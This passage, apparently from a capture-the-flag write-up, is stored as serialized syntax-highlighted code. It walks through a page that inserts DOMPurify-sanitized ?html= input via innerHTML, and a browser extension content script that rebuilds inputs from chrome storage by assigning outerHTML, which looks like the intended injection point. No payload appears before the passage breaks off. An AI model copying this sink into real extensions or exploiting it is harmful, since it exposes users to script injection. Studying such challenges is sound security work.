src",{"type":33,"tag":128,"props":15071,"children":15072},{"style":312},[15073],{"type":38,"value":315},{"type":33,"tag":128,"props":15075,"children":15076},{"style":676},[15077],{"type":38,"value":669},{"type":33,"tag":128,"props":15079,"children":15080},{"style":140},[15081],{"type":38,"value":15082},"https://unpkg.com/dompurify@latest/dist/purify.min.js",{"type":33,"tag":128,"props":15084,"children":15085},{"style":676},[15086],{"type":38,"value":669},{"type":33,"tag":128,"props":15088,"children":15089},{"style":312},[15090],{"type":38,"value":6136},{"type":33,"tag":128,"props":15092,"children":15093},{"style":1576},[15094],{"type":38,"value":15064},{"type":33,"tag":128,"props":15096,"children":15097},{"style":312},[15098],{"type":38,"value":6097},{"type":33,"tag":128,"props":15100,"children":15101},{"class":130,"line":1101},[15102,15106,15110],{"type":33,"tag":128,"props":15103,"children":15104},{"style":312},[15105],{"type":38,"value":6105},{"type":33,"tag":128,"props":15107,"children":15108},{"style":1576},[15109],{"type":38,"value":15064},{"type":33,"tag":128,"props":15111,"children":15112},{"style":312},[15113],{"type":38,"value":6097},{"type":33,"tag":128,"props":15115,"children":15116},{"class":130,"line":1114},[15117,15122,15127,15131,15135,15139,15143,15147,15151,15156],{"type":33,"tag":128,"props":15118,"children":15119},{"style":300},[15120],{"type":38,"value":15121}," const",{"type":33,"tag":128,"props":15123,"children":15124},{"style":306},[15125],{"type":38,"value":15126}," url",{"type":33,"tag":128,"props":15128,"children":15129},{"style":312},[15130],{"type":38,"value":5657},{"type":33,"tag":128,"props":15132,"children":15133},{"style":300},[15134],{"type":38,"value":13061},{"type":33,"tag":128,"props":15136,"children":15137},{"style":135},[15138],{"type":38,"value":13899},{"type":33,"tag":128,"props":15140,"children":15141},{"style":312},[15142],{"type":38,"value":5566},{"type":33,"tag":128,"props":15144,"children":15145},{"style":306},[15146],{"type":38,"value":8275},{"type":33,"tag":128,"props":15148,"children":15149},{"style":312},[15150],{"type":38,"value":215},{"type":33,"tag":128,"props":15152,"children":15153},{"style":306},[15154],{"type":38,"value":15155},"href",{"type":33,"tag":128,"props":15157,"children":15158},{"style":312},[15159],{"type":38,"value":5815},{"type":33,"tag":128,"props":15161,"children":15162},{"class":130,"line":1127},[15163,15167,15171,15175,15179,15183,15188,15192,15196,15200,15204,15208,15212],{"type":33,"tag":128,"props":15164,"children":15165},{"style":300},[15166],{"type":38,"value":15121},{"type":33,"tag":128,"props":15168,"children":15169},{"style":306},[15170],{"type":38,"value":14570},{"type":33,"tag":128,"props":15172,"children":15173},{"style":312},[15174],{"type":38,"value":5657},{"type":33,"tag":128,"props":15176,"children":15177},{"style":306},[15178],{"type":38,"value":15126},{"type":33,"tag":128,"props":15180,"children":15181},{"style":312},[15182],{"type":38,"value":215},{"type":33,"tag":128,"props":15184,"children":15185},{"style":306},[15186],{"type":38,"value":15187},"searchParams",{"type":33,"tag":128,"props":15189,"children":15190},{"style":312},[15191],{"type":38,"value":215},{"type":33,"tag":128,"props":15193,"children":15194},{"style":135},[15195],{"type":38,"value":13526},{"type":33,"tag":128,"props":15197,"children":15198},{"style":312},[15199],{"type":38,"value":5566},{"type":33,"tag":128,"props":15201,"children":15202},{"style":676},[15203],{"type":38,"value":6040},{"type":33,"tag":128,"props":15205,"children":15206},{"style":140},[15207],{"type":38,"value":5929},{"type":33,"tag":128,"props":15209,"children":15210},{"style":676},[15211],{"type":38,"value":6040},{"type":33,"tag":128,"props":15213,"children":15214},{"style":312},[15215],{"type":38,"value":5815},{"type":33,"tag":128,"props":15217,"children":15218},{"class":130,"line":1139},[15219,15224,15228,15232,15236],{"type":33,"tag":128,"props":15220,"children":15221},{"style":1576},[15222],{"type":38,"value":15223}," if",{"type":33,"tag":128,"props":15225,"children":15226},{"style":312},[15227],{"type":38,"value":2852},{"type":33,"tag":128,"props":15229,"children":15230},{"style":306},[15231],{"type":38,"value":5929},{"type":33,"tag":128,"props":15233,"children":15234},{"style":312},[15235],{"type":38,"value":2966},{"type":33,"tag":128,"props":15237,"children":15238},{"style":312},[15239],{"type":38,"value":762},{"type":33,"tag":128,"props":15241,"children":15242},{"class":130,"line":1152},[15243,15248,15252,15256,15260,15264,15269,15273,15277,15281,15285,15290,15294,15299,15303,15307],{"type":33,"tag":128,"props":15244,"children":15245},{"style":306},[15246],{"type":38,"value":15247}," document",{"type":33,"tag":128,"props":15249,"children":15250},{"style":312},[15251],{"type":38,"value":215},{"type":33,"tag":128,"props":15253,"children":15254},{"style":135},[15255],{"type":38,"value":7764},{"type":33,"tag":128,"props":15257,"children":15258},{"style":312},[15259],{"type":38,"value":5566},{"type":33,"tag":128,"props":15261,"children":15262},{"style":676},[15263],{"type":38,"value":6040},{"type":33,"tag":128,"props":15265,"children":15266},{"style":140},[15267],{"type":38,"value":15268},".output",{"type":33,"tag":128,"props":15270,"children":15271},{"style":676},[15272],{"type":38,"value":6040},{"type":33,"tag":128,"props":15274,"children":15275},{"style":312},[15276],{"type":38,"value":6700},{"type":33,"tag":128,"props":15278,"children":15279},{"style":306},[15280],{"type":38,"value":8391},{"type":33,"tag":128,"props":15282,"children":15283},{"style":312},[15284],{"type":38,"value":5657},{"type":33,"tag":128,"props":15286,"children":15287},{"style":306},[15288],{"type":38,"value":15289}," DOMPurify",{"type":33,"tag":128,"props":15291,"children":15292},{"style":312},[15293],{"type":38,"value":215},{"type":33,"tag":128,"props":15295,"children":15296},{"style":135},[15297],{"type":38,"value":15298},"sanitize",{"type":33,"tag":128,"props":15300,"children":15301},{"style":312},[15302],{"type":38,"value":5566},{"type":33,"tag":128,"props":15304,"children":15305},{"style":306},[15306],{"type":38,"value":5929},{"type":33,"tag":128,"props":15308,"children":15309},{"style":312},[15310],{"type":38,"value":5815},{"type":33,"tag":128,"props":15312,"children":15313},{"class":130,"line":1165},[15314],{"type":33,"tag":128,"props":15315,"children":15316},{"style":312},[15317],{"type":38,"value":15318}," }\n",{"type":33,"tag":128,"props":15320,"children":15321},{"class":130,"line":1177},[15322,15326,15330],{"type":33,"tag":128,"props":15323,"children":15324},{"style":312},[15325],{"type":38,"value":14993},{"type":33,"tag":128,"props":15327,"children":15328},{"style":1576},[15329],{"type":38,"value":15064},{"type":33,"tag":128,"props":15331,"children":15332},{"style":312},[15333],{"type":38,"value":6097},{"type":33,"tag":128,"props":15335,"children":15336},{"class":130,"line":1189},[15337,15341,15345],{"type":33,"tag":128,"props":15338,"children":15339},{"style":312},[15340],{"type":38,"value":6190},{"type":33,"tag":128,"props":15342,"children":15343},{"style":1576},[15344],{"type":38,"value":5671},{"type":33,"tag":128,"props":15346,"children":15347},{"style":312},[15348],{"type":38,"value":6097},{"type":33,"tag":128,"props":15350,"children":15351},{"class":130,"line":1202},[15352],{"type":33,"tag":128,"props":15353,"children":15354},{"emptyLinePlaceholder":896},[15355],{"type":38,"value":899},{"type":33,"tag":128,"props":15357,"children":15358},{"class":130,"line":1214},[15359,15363,15367],{"type":33,"tag":128,"props":15360,"children":15361},{"style":312},[15362],{"type":38,"value":6190},{"type":33,"tag":128,"props":15364,"children":15365},{"style":1576},[15366],{"type":38,"value":5929},{"type":33,"tag":128,"props":15368,"children":15369},{"style":312},[15370],{"type":38,"value":6097},{"type":33,"tag":47,"props":15372,"children":15373},{},[15374],{"type":38,"value":15375},"In detail, we can see in the code that the page takes the query parameter ?html= to update the div below the form. It sanitizes with the latest version of DOMPurify and adds the content via innerHTML.",{"type":33,"tag":81,"props":15377,"children":15379},{"id":15378},"web-extension",[15380],{"type":38,"value":15381},"Web extension:",{"type":33,"tag":88,"props":15383,"children":15385},{"id":15384},"contentscript",[15386],{"type":38,"value":15387},"ContentScript:",{"type":33,"tag":47,"props":15389,"children":15390},{},[15391,15393,15399,15400,15406],{"type":38,"value":15392},"The first part of the contentScript contain two main functions, ",{"type":33,"tag":105,"props":15394,"children":15396},{"className":15395},[],[15397],{"type":38,"value":15398},"loads()",{"type":38,"value":6345},{"type":33,"tag":105,"props":15401,"children":15403},{"className":15402},[],[15404],{"type":38,"value":15405},"saves()",{"type":38,"value":284},{"type":33,"tag":114,"props":15408,"children":15409},{"lang":5526},[15410],{"type":33,"tag":119,"props":15411,"children":15413},{"className":5530,"code":15412,"language":5526,"meta":8,"style":8},"async function main() {\n console.log('Content script is running');\n await loads();\n await saves();\n}\n\nmain();\n",[15414],{"type":33,"tag":105,"props":15415,"children":15416},{"__ignoreMap":8},[15417,15442,15479,15497,15513,15520,15527],{"type":33,"tag":128,"props":15418,"children":15419},{"class":130,"line":131},[15420,15424,15429,15434,15438],{"type":33,"tag":128,"props":15421,"children":15422},{"style":300},[15423],{"type":38,"value":13862},{"type":33,"tag":128,"props":15425,"children":15426},{"style":300},[15427],{"type":38,"value":15428}," function",{"type":33,"tag":128,"props":15430,"children":15431},{"style":135},[15432],{"type":38,"value":15433}," main",{"type":33,"tag":128,"props":15435,"children":15436},{"style":312},[15437],{"type":38,"value":9376},{"type":33,"tag":128,"props":15439,"children":15440},{"style":312},[15441],{"type":38,"value":762},{"type":33,"tag":128,"props":15443,"children":15444},{"class":130,"line":362},[15445,15450,15454,15458,15462,15466,15471,15475],{"type":33,"tag":128,"props":15446,"children":15447},{"style":306},[15448],{"type":38,"value":15449}," console",{"type":33,"tag":128,"props":15451,"children":15452},{"style":312},[15453],{"type":38,"value":215},{"type":33,"tag":128,"props":15455,"children":15456},{"style":135},[15457],{"type":38,"value":13157},{"type":33,"tag":128,"props":15459,"children":15460},{"style":312},[15461],{"type":38,"value":5566},{"type":33,"tag":128,"props":15463,"children":15464},{"style":676},[15465],{"type":38,"value":6040},{"type":33,"tag":128,"props":15467,"children":15468},{"style":140},[15469],{"type":38,"value":15470},"Content script is running",{"type":33,"tag":128,"props":15472,"children":15473},{"style":676},[15474],{"type":38,"value":6040},{"type":33,"tag":128,"props":15476,"children":15477},{"style":312},[15478],{"type":38,"value":5815},{"type":33,"tag":128,"props":15480,"children":15481},{"class":130,"line":403},[15482,15487,15492],{"type":33,"tag":128,"props":15483,"children":15484},{"style":1576},[15485],{"type":38,"value":15486}," await",{"type":33,"tag":128,"props":15488,"children":15489},{"style":135},[15490],{"type":38,"value":15491}," loads",{"type":33,"tag":128,"props":15493,"children":15494},{"style":312},[15495],{"type":38,"value":15496},"();\n",{"type":33,"tag":128,"props":15498,"children":15499},{"class":130,"line":739},[15500,15504,15509],{"type":33,"tag":128,"props":15501,"children":15502},{"style":1576},[15503],{"type":38,"value":15486},{"type":33,"tag":128,"props":15505,"children":15506},{"style":135},[15507],{"type":38,"value":15508}," saves",{"type":33,"tag":128,"props":15510,"children":15511},{"style":312},[15512],{"type":38,"value":15496},{"type":33,"tag":128,"props":15514,"children":15515},{"class":130,"line":765},[15516],{"type":33,"tag":128,"props":15517,"children":15518},{"style":312},[15519],{"type":38,"value":854},{"type":33,"tag":128,"props":15521,"children":15522},{"class":130,"line":804},[15523],{"type":33,"tag":128,"props":15524,"children":15525},{"emptyLinePlaceholder":896},[15526],{"type":38,"value":899},{"type":33,"tag":128,"props":15528,"children":15529},{"class":130,"line":839},[15530,15535],{"type":33,"tag":128,"props":15531,"children":15532},{"style":135},[15533],{"type":38,"value":15534},"main",{"type":33,"tag":128,"props":15536,"children":15537},{"style":312},[15538],{"type":38,"value":15496},{"type":33,"tag":47,"props":15540,"children":15541},{},[15542,15543,15548,15550,15556,15558,15564],{"type":38,"value":2766},{"type":33,"tag":105,"props":15544,"children":15546},{"className":15545},[],[15547],{"type":38,"value":15398},{"type":38,"value":15549}," function will allow loading the elements that are in the chrome storage via a key defined at save. When loading, each input will be recreated via the ",{"type":33,"tag":105,"props":15551,"children":15553},{"className":15552},[],[15554],{"type":38,"value":15555},"input()",{"type":38,"value":15557}," function and update the DOM by defining ",{"type":33,"tag":105,"props":15559,"children":15561},{"className":15560},[],[15562],{"type":38,"value":15563},"p.outerHTML",{"type":38,"value":215},{"type":33,"tag":114,"props":15566,"children":15567},{"lang":5526},[15568],{"type":33,"tag":119,"props":15569,"children":15571},{"className":5530,"code":15570,"language":5526,"meta":8,"style":8},"function load(key) {\n return new Promise((resolve, reject) => {\n chrome.runtime.sendMessage(\n {\n type: 'LOAD',\n payload: { key },\n },\n response => {\n if (response.error) {\n return reject(response.error);\n }\n resolve(response);\n }\n );\n })\n}\n\nasync function loads() {\n var inputs = document.querySelectorAll('input');\n for (const p of inputs) {\n const key = p.name;\n try {\n var data = await load(key);\n if (data) {\n console.log(input(key, data, p.outerHTML))\n p.outerHTML = input(key, data, p.outerHTML);\n }\n } catch (error) {\n console.log('Error loading data', error);\n continue;\n }\n }\n}\n",[15572],{"type":33,"tag":105,"props":15573,"children":15574},{"__ignoreMap":8},[15575,15602,15645,15674,15682,15710,15735,15743,15759,15790,15822,15829,15849,15856,15864,15871,15878,15885,15908,15957,15996,16027,16039,16075,16098,16159,16220,16227,16254,16298,16310,16317,16324],{"type":33,"tag":128,"props":15576,"children":15577},{"class":130,"line":131},[15578,15582,15586,15590,15594,15598],{"type":33,"tag":128,"props":15579,"children":15580},{"style":300},[15581],{"type":38,"value":13008},{"type":33,"tag":128,"props":15583,"children":15584},{"style":135},[15585],{"type":38,"value":13340},{"type":33,"tag":128,"props":15587,"children":15588},{"style":312},[15589],{"type":38,"value":5566},{"type":33,"tag":128,"props":15591,"children":15592},{"style":306},[15593],{"type":38,"value":13022},{"type":33,"tag":128,"props":15595,"children":15596},{"style":312},[15597],{"type":38,"value":2966},{"type":33,"tag":128,"props":15599,"children":15600},{"style":312},[15601],{"type":38,"value":762},{"type":33,"tag":128,"props":15603,"children":15604},{"class":130,"line":362},[15605,15609,15613,15617,15621,15625,15629,15633,15637,15641],{"type":33,"tag":128,"props":15606,"children":15607},{"style":1576},[15608],{"type":38,"value":13056},{"type":33,"tag":128,"props":15610,"children":15611},{"style":300},[15612],{"type":38,"value":13061},{"type":33,"tag":128,"props":15614,"children":15615},{"style":437},[15616],{"type":38,"value":13066},{"type":33,"tag":128,"props":15618,"children":15619},{"style":312},[15620],{"type":38,"value":13071},{"type":33,"tag":128,"props":15622,"children":15623},{"style":306},[15624],{"type":38,"value":13076},{"type":33,"tag":128,"props":15626,"children":15627},{"style":312},[15628],{"type":38,"value":5584},{"type":33,"tag":128,"props":15630,"children":15631},{"style":306},[15632],{"type":38,"value":13085},{"type":33,"tag":128,"props":15634,"children":15635},{"style":312},[15636],{"type":38,"value":2966},{"type":33,"tag":128,"props":15638,"children":15639},{"style":312},[15640],{"type":38,"value":5625},{"type":33,"tag":128,"props":15642,"children":15643},{"style":312},[15644],{"type":38,"value":762},{"type":33,"tag":128,"props":15646,"children":15647},{"class":130,"line":403},[15648,15652,15656,15660,15664,15669],{"type":33,"tag":128,"props":15649,"children":15650},{"style":306},[15651],{"type":38,"value":13202},{"type":33,"tag":128,"props":15653,"children":15654},{"style":312},[15655],{"type":38,"value":215},{"type":33,"tag":128,"props":15657,"children":15658},{"style":306},[15659],{"type":38,"value":13784},{"type":33,"tag":128,"props":15661,"children":15662},{"style":312},[15663],{"type":38,"value":215},{"type":33,"tag":128,"props":15665,"children":15666},{"style":135},[15667],{"type":38,"value":15668},"sendMessage",{"type":33,"tag":128,"props":15670,"children":15671},{"style":312},[15672],{"type":38,"value":15673},"(\n",{"type":33,"tag":128,"props":15675,"children":15676},{"class":130,"line":739},[15677],{"type":33,"tag":128,"props":15678,"children":15679},{"style":312},[15680],{"type":38,"value":15681}," {\n",{"type":33,"tag":128,"props":15683,"children":15684},{"class":130,"line":765},[15685,15690,15694,15698,15702,15706],{"type":33,"tag":128,"props":15686,"children":15687},{"style":437},[15688],{"type":38,"value":15689}," type",{"type":33,"tag":128,"props":15691,"children":15692},{"style":312},[15693],{"type":38,"value":284},{"type":33,"tag":128,"props":15695,"children":15696},{"style":676},[15697],{"type":38,"value":6739},{"type":33,"tag":128,"props":15699,"children":15700},{"style":140},[15701],{"type":38,"value":14303},{"type":33,"tag":128,"props":15703,"children":15704},{"style":676},[15705],{"type":38,"value":6040},{"type":33,"tag":128,"props":15707,"children":15708},{"style":312},[15709],{"type":38,"value":693},{"type":33,"tag":128,"props":15711,"children":15712},{"class":130,"line":804},[15713,15718,15722,15726,15730],{"type":33,"tag":128,"props":15714,"children":15715},{"style":437},[15716],{"type":38,"value":15717}," payload",{"type":33,"tag":128,"props":15719,"children":15720},{"style":312},[15721],{"type":38,"value":284},{"type":33,"tag":128,"props":15723,"children":15724},{"style":312},[15725],{"type":38,"value":5642},{"type":33,"tag":128,"props":15727,"children":15728},{"style":306},[15729],{"type":38,"value":5027},{"type":33,"tag":128,"props":15731,"children":15732},{"style":312},[15733],{"type":38,"value":15734}," },\n",{"type":33,"tag":128,"props":15736,"children":15737},{"class":130,"line":839},[15738],{"type":33,"tag":128,"props":15739,"children":15740},{"style":312},[15741],{"type":38,"value":15742}," },\n",{"type":33,"tag":128,"props":15744,"children":15745},{"class":130,"line":848},[15746,15751,15755],{"type":33,"tag":128,"props":15747,"children":15748},{"style":306},[15749],{"type":38,"value":15750}," response",{"type":33,"tag":128,"props":15752,"children":15753},{"style":312},[15754],{"type":38,"value":5625},{"type":33,"tag":128,"props":15756,"children":15757},{"style":312},[15758],{"type":38,"value":762},{"type":33,"tag":128,"props":15760,"children":15761},{"class":130,"line":976},[15762,15766,15770,15774,15778,15782,15786],{"type":33,"tag":128,"props":15763,"children":15764},{"style":1576},[15765],{"type":38,"value":15223},{"type":33,"tag":128,"props":15767,"children":15768},{"style":312},[15769],{"type":38,"value":2852},{"type":33,"tag":128,"props":15771,"children":15772},{"style":306},[15773],{"type":38,"value":14194},{"type":33,"tag":128,"props":15775,"children":15776},{"style":312},[15777],{"type":38,"value":215},{"type":33,"tag":128,"props":15779,"children":15780},{"style":306},[15781],{"type":38,"value":6889},{"type":33,"tag":128,"props":15783,"children":15784},{"style":312},[15785],{"type":38,"value":2966},{"type":33,"tag":128,"props":15787,"children":15788},{"style":312},[15789],{"type":38,"value":762},{"type":33,"tag":128,"props":15791,"children":15792},{"class":130,"line":988},[15793,15798,15802,15806,15810,15814,15818],{"type":33,"tag":128,"props":15794,"children":15795},{"style":1576},[15796],{"type":38,"value":15797}," return",{"type":33,"tag":128,"props":15799,"children":15800},{"style":135},[15801],{"type":38,"value":13085},{"type":33,"tag":128,"props":15803,"children":15804},{"style":312},[15805],{"type":38,"value":5566},{"type":33,"tag":128,"props":15807,"children":15808},{"style":306},[15809],{"type":38,"value":14194},{"type":33,"tag":128,"props":15811,"children":15812},{"style":312},[15813],{"type":38,"value":215},{"type":33,"tag":128,"props":15815,"children":15816},{"style":306},[15817],{"type":38,"value":6889},{"type":33,"tag":128,"props":15819,"children":15820},{"style":312},[15821],{"type":38,"value":5815},{"type":33,"tag":128,"props":15823,"children":15824},{"class":130,"line":1001},[15825],{"type":33,"tag":128,"props":15826,"children":15827},{"style":312},[15828],{"type":38,"value":15318},{"type":33,"tag":128,"props":15830,"children":15831},{"class":130,"line":1014},[15832,15837,15841,15845],{"type":33,"tag":128,"props":15833,"children":15834},{"style":135},[15835],{"type":38,"value":15836}," resolve",{"type":33,"tag":128,"props":15838,"children":15839},{"style":312},[15840],{"type":38,"value":5566},{"type":33,"tag":128,"props":15842,"children":15843},{"style":306},[15844],{"type":38,"value":14194},{"type":33,"tag":128,"props":15846,"children":15847},{"style":312},[15848],{"type":38,"value":5815},{"type":33,"tag":128,"props":15850,"children":15851},{"class":130,"line":1026},[15852],{"type":33,"tag":128,"props":15853,"children":15854},{"style":312},[15855],{"type":38,"value":13656},{"type":33,"tag":128,"props":15857,"children":15858},{"class":130,"line":1038},[15859],{"type":33,"tag":128,"props":15860,"children":15861},{"style":312},[15862],{"type":38,"value":15863}," );\n",{"type":33,"tag":128,"props":15865,"children":15866},{"class":130,"line":1051},[15867],{"type":33,"tag":128,"props":15868,"children":15869},{"style":312},[15870],{"type":38,"value":13321},{"type":33,"tag":128,"props":15872,"children":15873},{"class":130,"line":1063},[15874],{"type":33,"tag":128,"props":15875,"children":15876},{"style":312},[15877],{"type":38,"value":854},{"type":33,"tag":128,"props":15879,"children":15880},{"class":130,"line":1076},[15881],{"type":33,"tag":128,"props":15882,"children":15883},{"emptyLinePlaceholder":896},[15884],{"type":38,"value":899},{"type":33,"tag":128,"props":15886,"children":15887},{"class":130,"line":1089},[15888,15892,15896,15900,15904],{"type":33,"tag":128,"props":15889,"children":15890},{"style":300},[15891],{"type":38,"value":13862},{"type":33,"tag":128,"props":15893,"children":15894},{"style":300},[15895],{"type":38,"value":15428},{"type":33,"tag":128,"props":15897,"children":15898},{"style":135},[15899],{"type":38,"value":15491},{"type":33,"tag":128,"props":15901,"children":15902},{"style":312},[15903],{"type":38,"value":9376},{"type":33,"tag":128,"props":15905,"children":15906},{"style":312},[15907],{"type":38,"value":762},{"type":33,"tag":128,"props":15909,"children":15910},{"class":130,"line":1101},[15911,15916,15921,15925,15929,15933,15937,15941,15945,15949,15953],{"type":33,"tag":128,"props":15912,"children":15913},{"style":300},[15914],{"type":38,"value":15915}," var",{"type":33,"tag":128,"props":15917,"children":15918},{"style":306},[15919],{"type":38,"value":15920}," inputs",{"type":33,"tag":128,"props":15922,"children":15923},{"style":312},[15924],{"type":38,"value":5657},{"type":33,"tag":128,"props":15926,"children":15927},{"style":306},[15928],{"type":38,"value":7562},{"type":33,"tag":128,"props":15930,"children":15931},{"style":312},[15932],{"type":38,"value":215},{"type":33,"tag":128,"props":15934,"children":15935},{"style":135},[15936],{"type":38,"value":7806},{"type":33,"tag":128,"props":15938,"children":15939},{"style":312},[15940],{"type":38,"value":5566},{"type":33,"tag":128,"props":15942,"children":15943},{"style":676},[15944],{"type":38,"value":6040},{"type":33,"tag":128,"props":15946,"children":15947},{"style":140},[15948],{"type":38,"value":14882},{"type":33,"tag":128,"props":15950,"children":15951},{"style":676},[15952],{"type":38,"value":6040},{"type":33,"tag":128,"props":15954,"children":15955},{"style":312},[15956],{"type":38,"value":5815},{"type":33,"tag":128,"props":15958,"children":15959},{"class":130,"line":1114},[15960,15965,15969,15974,15979,15984,15988,15992],{"type":33,"tag":128,"props":15961,"children":15962},{"style":1576},[15963],{"type":38,"value":15964}," for",{"type":33,"tag":128,"props":15966,"children":15967},{"style":312},[15968],{"type":38,"value":2852},{"type":33,"tag":128,"props":15970,"children":15971},{"style":300},[15972],{"type":38,"value":15973},"const",{"type":33,"tag":128,"props":15975,"children":15976},{"style":306},[15977],{"type":38,"value":15978}," p",{"type":33,"tag":128,"props":15980,"children":15981},{"style":300},[15982],{"type":38,"value":15983}," of",{"type":33,"tag":128,"props":15985,"children":15986},{"style":306},[15987],{"type":38,"value":15920},{"type":33,"tag":128,"props":15989,"children":15990},{"style":312},[15991],{"type":38,"value":2966},{"type":33,"tag":128,"props":15993,"children":15994},{"style":312},[15995],{"type":38,"value":762},{"type":33,"tag":128,"props":15997,"children":15998},{"class":130,"line":1127},[15999,16003,16007,16011,16015,16019,16023],{"type":33,"tag":128,"props":16000,"children":16001},{"style":300},[16002],{"type":38,"value":5696},{"type":33,"tag":128,"props":16004,"children":16005},{"style":306},[16006],{"type":38,"value":5027},{"type":33,"tag":128,"props":16008,"children":16009},{"style":312},[16010],{"type":38,"value":5657},{"type":33,"tag":128,"props":16012,"children":16013},{"style":306},[16014],{"type":38,"value":15978},{"type":33,"tag":128,"props":16016,"children":16017},{"style":312},[16018],{"type":38,"value":215},{"type":33,"tag":128,"props":16020,"children":16021},{"style":306},[16022],{"type":38,"value":12126},{"type":33,"tag":128,"props":16024,"children":16025},{"style":312},[16026],{"type":38,"value":5676},{"type":33,"tag":128,"props":16028,"children":16029},{"class":130,"line":1139},[16030,16035],{"type":33,"tag":128,"props":16031,"children":16032},{"style":1576},[16033],{"type":38,"value":16034}," try",{"type":33,"tag":128,"props":16036,"children":16037},{"style":312},[16038],{"type":38,"value":762},{"type":33,"tag":128,"props":16040,"children":16041},{"class":130,"line":1152},[16042,16047,16051,16055,16059,16063,16067,16071],{"type":33,"tag":128,"props":16043,"children":16044},{"style":300},[16045],{"type":38,"value":16046}," var",{"type":33,"tag":128,"props":16048,"children":16049},{"style":306},[16050],{"type":38,"value":13545},{"type":33,"tag":128,"props":16052,"children":16053},{"style":312},[16054],{"type":38,"value":5657},{"type":33,"tag":128,"props":16056,"children":16057},{"style":1576},[16058],{"type":38,"value":5796},{"type":33,"tag":128,"props":16060,"children":16061},{"style":135},[16062],{"type":38,"value":13340},{"type":33,"tag":128,"props":16064,"children":16065},{"style":312},[16066],{"type":38,"value":5566},{"type":33,"tag":128,"props":16068,"children":16069},{"style":306},[16070],{"type":38,"value":13022},{"type":33,"tag":128,"props":16072,"children":16073},{"style":312},[16074],{"type":38,"value":5815},{"type":33,"tag":128,"props":16076,"children":16077},{"class":130,"line":1165},[16078,16082,16086,16090,16094],{"type":33,"tag":128,"props":16079,"children":16080},{"style":1576},[16081],{"type":38,"value":13561},{"type":33,"tag":128,"props":16083,"children":16084},{"style":312},[16085],{"type":38,"value":2852},{"type":33,"tag":128,"props":16087,"children":16088},{"style":306},[16089],{"type":38,"value":2815},{"type":33,"tag":128,"props":16091,"children":16092},{"style":312},[16093],{"type":38,"value":2966},{"type":33,"tag":128,"props":16095,"children":16096},{"style":312},[16097],{"type":38,"value":762},{"type":33,"tag":128,"props":16099,"children":16100},{"class":130,"line":1177},[16101,16106,16110,16114,16118,16122,16126,16130,16134,16138,16142,16146,16150,16155],{"type":33,"tag":128,"props":16102,"children":16103},{"style":306},[16104],{"type":38,"value":16105}," console",{"type":33,"tag":128,"props":16107,"children":16108},{"style":312},[16109],{"type":38,"value":215},{"type":33,"tag":128,"props":16111,"children":16112},{"style":135},[16113],{"type":38,"value":13157},{"type":33,"tag":128,"props":16115,"children":16116},{"style":312},[16117],{"type":38,"value":5566},{"type":33,"tag":128,"props":16119,"children":16120},{"style":135},[16121],{"type":38,"value":14882},{"type":33,"tag":128,"props":16123,"children":16124},{"style":312},[16125],{"type":38,"value":5566},{"type":33,"tag":128,"props":16127,"children":16128},{"style":306},[16129],{"type":38,"value":13022},{"type":33,"tag":128,"props":16131,"children":16132},{"style":312},[16133],{"type":38,"value":5584},{"type":33,"tag":128,"props":16135,"children":16136},{"style":306},[16137],{"type":38,"value":13545},{"type":33,"tag":128,"props":16139,"children":16140},{"style":312},[16141],{"type":38,"value":5584},{"type":33,"tag":128,"props":16143,"children":16144},{"style":306},[16145],{"type":38,"value":15978},{"type":33,"tag":128,"props":16147,"children":16148},{"style":312},[16149],{"type":38,"value":215},{"type":33,"tag":128,"props":16151,"children":16152},{"style":306},[16153],{"type":38,"value":16154},"outerHTML",{"type":33,"tag":128,"props":16156,"children":16157},{"style":312},[16158],{"type":38,"value":2459},{"type":33,"tag":128,"props":16160,"children":16161},{"class":130,"line":1189},[16162,16167,16171,16175,16179,16184,16188,16192,16196,16200,16204,16208,16212,16216],{"type":33,"tag":128,"props":16163,"children":16164},{"style":306},[16165],{"type":38,"value":16166}," p",{"type":33,"tag":128,"props":16168,"children":16169},{"style":312},[16170],{"type":38,"value":215},{"type":33,"tag":128,"props":16172,"children":16173},{"style":306},[16174],{"type":38,"value":16154},{"type":33,"tag":128,"props":16176,"children":16177},{"style":312},[16178],{"type":38,"value":5657},{"type":33,"tag":128,"props":16180,"children":16181},{"style":135},[16182],{"type":38,"value":16183}," input",{"type":33,"tag":128,"props":16185,"children":16186},{"style":312},[16187],{"type":38,"value":5566},{"type":33,"tag":128,"props":16189,"children":16190},{"style":306},[16191],{"type":38,"value":13022},{"type":33,"tag":128,"props":16193,"children":16194},{"style":312},[16195],{"type":38,"value":5584},{"type":33,"tag":128,"props":16197,"children":16198},{"style":306},[16199],{"type":38,"value":13545},{"type":33,"tag":128,"props":16201,"children":16202},{"style":312},[16203],{"type":38,"value":5584},{"type":33,"tag":128,"props":16205,"children":16206},{"style":306},[16207],{"type":38,"value":15978},{"type":33,"tag":128,"props":16209,"children":16210},{"style":312},[16211],{"type":38,"value":215},{"type":33,"tag":128,"props":16213,"children":16214},{"style":306},[16215],{"type":38,"value":16154},{"type":33,"tag":128,"props":16217,"children":16218},{"style":312},[16219],{"type":38,"value":5815},{"type":33,"tag":128,"props":16221,"children":16222},{"class":130,"line":1202},[16223],{"type":33,"tag":128,"props":16224,"children":16225},{"style":312},[16226],{"type":38,"value":13656},{"type":33,"tag":128,"props":16228,"children":16229},{"class":130,"line":1214},[16230,16234,16238,16242,16246,16250],{"type":33,"tag":128,"props":16231,"children":16232},{"style":312},[16233],{"type":38,"value":14264},{"type":33,"tag":128,"props":16235,"children":16236},{"style":1576},[16237],{"type":38,"value":6855},{"type":33,"tag":128,"props":16239,"children":16240},{"style":312},[16241],{"type":38,"value":2852},{"type":33,"tag":128,"props":16243,"children":16244},{"style":306},[16245],{"type":38,"value":6889},{"type":33,"tag":128,"props":16247,"children":16248},{"style":312},[16249],{"type":38,"value":2966},{"type":33,"tag":128,"props":16251,"children":16252},{"style":312},[16253],{"type":38,"value":762},{"type":33,"tag":128,"props":16255,"children":16256},{"class":130,"line":1226},[16257,16261,16265,16269,16273,16277,16282,16286,16290,16294],{"type":33,"tag":128,"props":16258,"children":16259},{"style":306},[16260],{"type":38,"value":13664},{"type":33,"tag":128,"props":16262,"children":16263},{"style":312},[16264],{"type":38,"value":215},{"type":33,"tag":128,"props":16266,"children":16267},{"style":135},[16268],{"type":38,"value":13157},{"type":33,"tag":128,"props":16270,"children":16271},{"style":312},[16272],{"type":38,"value":5566},{"type":33,"tag":128,"props":16274,"children":16275},{"style":676},[16276],{"type":38,"value":6040},{"type":33,"tag":128,"props":16278,"children":16279},{"style":140},[16280],{"type":38,"value":16281},"Error loading 